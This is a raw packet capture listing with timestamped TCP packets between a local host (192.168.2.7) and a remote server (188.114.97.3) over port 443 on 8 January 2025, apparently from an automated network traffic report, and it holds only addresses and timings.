                                                      Jan 8, 2025 13:55:09.341664076 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.341721058 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.341727972 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.341739893 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.341790915 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.342333078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.342392921 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.346890926 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.346930981 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.346947908 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.346955061 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.346991062 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.347058058 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.347106934 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.347115040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.348592997 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.348648071 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.348663092 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.348670006 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.348711967 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.370942116 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.370982885 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.371001005 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.371012926 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.371035099 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.371043921 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.371094942 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.371100903 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.371658087 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.371689081 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.371712923 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.371721029 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.371732950 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.372649908 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.372687101 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.372719049 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.372726917 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.372752905 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.373424053 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.373518944 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.373527050 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.382745028 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.382776976 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.382807016 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.382810116 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.382827044 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.382838011 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.382870913 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.384967089 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.385016918 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.385023117 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.385029078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.385059118 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.385432959 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.385483027 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.385490894 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.400715113 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.400752068 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.400832891 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.400856018 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.405759096 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.405827045 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.405844927 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.406894922 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.406929016 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.406936884 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.406944990 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.406982899 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.409868002 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.409964085 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.409970045 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.420689106 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.420737028 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.420759916 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.420764923 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.420777082 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.420804977 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.420825958 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.421580076 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.421639919 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.421642065 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.421649933 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.421700001 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.425983906 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.426032066 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.426153898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.426219940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.426219940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.426219940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.426230907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.426425934 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.428678036 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.428713083 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.428749084 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.428756952 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.428769112 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.434971094 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.435003996 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.435031891 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.435034990 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.435045958 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.435067892 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.435091019 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.438308954 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.438349009 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.438354969 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.438361883 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.438380957 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.438388109 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.438433886 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.438441038 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.440999985 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.441060066 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.441068888 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.441188097 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.441224098 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.441239119 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.441247940 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.441260099 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.441281080 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.441304922 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.441310883 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463685989 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463737011 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463742018 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.463757992 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463778973 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463794947 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463819981 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.463826895 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463843107 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.463846922 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.463900089 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.463907003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.464746952 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.464797974 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.464807987 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.464896917 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.464955091 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.464962959 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.477767944 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.477832079 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.477843046 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.477858067 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.477886915 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.477911949 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.477920055 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.477951050 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.491522074 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.491542101 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.491595030 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.491627932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.491642952 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.491691113 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.491739035 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.491749048 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.491794109 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.491976023 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.492047071 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.499371052 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.499398947 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.499428034 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.499435902 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.499459028 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.501903057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.501934052 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.501955032 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.501964092 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.501993895 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.502002954 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.513818979 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.513887882 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.514142036 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.514209986 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.514633894 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.514688015 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.515038967 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.515098095 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.527121067 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.527178049 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.527179956 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.527199984 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.527235985 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.527509928 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.527563095 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.527566910 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.527578115 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.527612925 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.530538082 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.530603886 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.531121016 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.531214952 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.534044981 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.534127951 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.556123972 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.556194067 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.556289911 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.556343079 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.556904078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.556978941 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.569926023 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.569964886 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.570012093 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.570022106 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.570060968 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.583456993 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.583493948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.583542109 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.583551884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.583602905 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.583847046 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.583900928 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.584445953 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.584507942 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.584516048 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.584523916 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.584574938 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.590760946 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.590828896 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.594223022 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.594281912 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.594360113 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.594413996 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.606515884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.606575012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.606592894 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.606600046 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.606630087 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.606653929 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.607089043 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.607161045 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.610069990 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.610140085 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.619180918 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.619247913 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.619486094 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.619545937 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.623191118 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.623239994 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.623271942 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.623280048 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.623326063 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.623745918 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.623825073 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.648233891 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.648252010 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.648314953 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.648329973 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.648374081 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.649344921 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.649363041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.649471998 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.649481058 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.649523973 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.675878048 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.675936937 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.675952911 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.675962925 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.676018000 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.677170038 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.677189112 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.677233934 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.677241087 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.677283049 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.677297115 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.682401896 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.682463884 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.685894966 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.685970068 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.686058998 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.686136961 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.698260069 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.698321104 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.698900938 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.698986053 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.711891890 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.711908102 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.711977005 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.711986065 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.715639114 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.715676069 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.715704918 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.715713978 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.715759993 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.718276978 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.718301058 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.718329906 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.718357086 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.718364000 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.718398094 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.740720987 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.740792036 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.740806103 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.741244078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.741302013 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.741309881 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.741679907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.741738081 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.741745949 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.741755962 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.741797924 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.741806030 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.754782915 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.754848003 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.754857063 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.754900932 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.772898912 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.772947073 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.772970915 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.772983074 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.773020983 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.773042917 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.773380995 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.773446083 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.775926113 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.775974035 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.775991917 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.776000023 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.776026964 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.779933929 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.780004025 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.780011892 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.791034937 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.791054964 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.791100979 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.791111946 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.791146994 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.794769049 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.794830084 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.794837952 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.794881105 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.808151960 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.808167934 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.808235884 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.808253050 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.808305025 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.808875084 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.808943987 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.808950901 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.833148003 CET44349706188.114.97.3192.168.2.7
